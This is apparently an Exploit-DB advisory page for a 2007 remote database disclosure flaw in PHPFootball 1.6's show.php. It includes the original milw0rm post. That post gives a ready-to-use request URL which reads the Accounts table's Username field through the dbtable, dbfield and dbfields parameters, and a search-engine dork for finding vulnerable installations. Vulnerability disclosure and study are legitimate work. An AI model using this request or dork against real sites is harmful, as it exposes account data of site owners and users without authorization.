PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

vendor:

PHPFootball

by:

ajann

7.5

CVSS

HIGH

Remote Database Disclosure

CWE

Product Name: PHPFootball

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

The PHPFootball 1.6 show.php script allows remote attackers to read sensitive information from the database by specifying the dbtable, dbfield, and dbfields parameters in a request.

Mitigation:

Unknown

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://phpfootball.sourceforge.net
# $$      :  Free
# Dork    :  inurl:/phpfootball/

*******************************************************************************

[[DBREAD]]]---------------------------------------------------------

http://[target]/[path]//show.php [VARIABLES]

Example:

//show.php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id&

[dbtable] :Database Table Name
[dbfield] :Field Name
[dbfields]:Listing(Order by x)

[[/DBREAD]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-30]